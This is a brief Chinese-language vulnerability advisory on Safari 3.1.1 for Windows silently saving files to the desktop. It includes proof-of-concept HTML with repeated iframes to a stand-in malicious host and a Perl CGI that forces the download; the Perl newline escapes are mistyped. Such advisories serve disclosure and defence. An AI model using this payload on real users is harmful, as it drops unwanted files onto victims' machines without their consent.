受影响
系统:
Apple Safari 3.1.1
- Microsoft
Windows XP SP3
- Microsoft Windows XP SP2
- Microsoft Windows Vista
描述:
Safari是苹果家族操作系统所捆绑的WEB浏览器。
Safari浏览器无法配置为在下载资源之前获得用户的许可,未经用户同意便将资源
下载到了默认的位置。
假设用户访问了提供以下HTML的
恶意站点
http://malicious.example.com/ :
<HTML>
<iframe id="frame" src="
http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="
http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="
http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="
http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>
其中
http://malicious.example.com/cgi-bin/carpet_bomb.cgi 为:
#!/usr/bin/perl
print "Content-type: blah/blah/n/n"
由于Safari不知道如何渲染blah/blah内容类型,就会自动开始下载carpet_bomb.cgi。如果在Windows平台上使用Safari的话,访问
http://malicious.example.com/ 后就会未经用户同意向用户桌面下载恶意
软件。
厂商补丁:
目前厂商还没有提供补丁或者升级
程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.apple.com
